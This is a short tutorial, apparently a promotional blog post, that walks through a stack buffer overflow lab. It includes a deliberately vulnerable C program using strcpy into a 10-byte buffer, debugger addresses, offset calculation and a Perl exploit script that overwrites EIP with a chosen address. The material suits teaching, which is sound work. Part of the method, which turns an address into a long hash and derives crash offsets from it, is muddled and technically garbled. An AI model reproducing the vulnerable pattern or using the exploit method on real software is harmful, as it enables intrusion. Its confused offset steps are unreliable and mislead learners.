Introduction of Buffer Overflow Cyber Security Notes
Buffer over flow is the concept in which an application is poorly coded. There is no proper exception handeling deployed at all. The attacker can change the value of EIP and can overwrite it with malicious code’s address.
Requirements for Buffer Overflow
————
1. Windows OS
2. Vulnerable Application
DEVCPP 4.9.9
3. OllyDBG
4. Perl
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int overflow(char * s)
{
char buffer[10]; //This is our buffer
strcpy(buffer,s); //this is vulnerable code
return 0;
}
exploit()
{
printf(“Buffer Overflow Chal Gya Hai….\n”);
}
int main(int argc, char *argv[])
{
printf(“You are in the main code….\n”);
int a = 0;
overflow(argv[1]);
if(a == 1)
{
exploit();
}
else
{
printf(“Buffer Overflow Fail Ho Gya Hai….\n”);
}
return 0;
}
nmap -sS -sC -sV 192.168.0.1 -Pn
int argc, char *argv[]
argc –> Number of arguments passed
argv –> Data of the argument passed
argv[1] –> -sS
argv[2] –> -sC
argv[3] –> -sV
argv[4] –> 192.168.0.1
argv[5] –> -Pn
00401316 |. E8 94FFFFFF CALL Ganesh.004012AF
00401316 —> Normal Form
EIP Always reads data in Little Endian Form
00401316
00 40 13 16
16 13 40 00 —> Little Endian Form
16 13 40 00 –> convert it into the hash
1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
ganesh.exe 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
Exception Offset: 35376239
ASCII Value
35376239 —> COnvert it into Little Endian Form
35376239
35 37 62 39
39 62 37 35 —> ASCII Value
9b75
1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
1e66186a8e7f4a61ebaae3f46ae29b75
1e66186a8e7f4a61ebaae3f46ae2 9b75
A –> 41
B –> 42
C –> 43
D –> 44
E –> 45
28 times A + BCDE
AAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE
42434445
45444342
Exception Offset: 45444342
Perl For Creating an exploit
my $junk=”\x41″ x 28; #28 times A
my $EIP=”\x16\x13\x40\x00″; #address of the malicious code
my $exploit=$junk.$EIP;
print “Buffer Overflow Fatne wala hai….\n”;
system(“ganesh.exe”,$exploit);
print “Diwali Mubarak Ho…\n”;
Follow Us On Cyber Point Solution Youtube Channel : Click Here
Follow Us on Social Platforms to get Updated : twiter, facebook, Google Plus
Learn More Ethical Hacking and Cyber Security click on this link. cyber security
source – https://ufile.io/9os13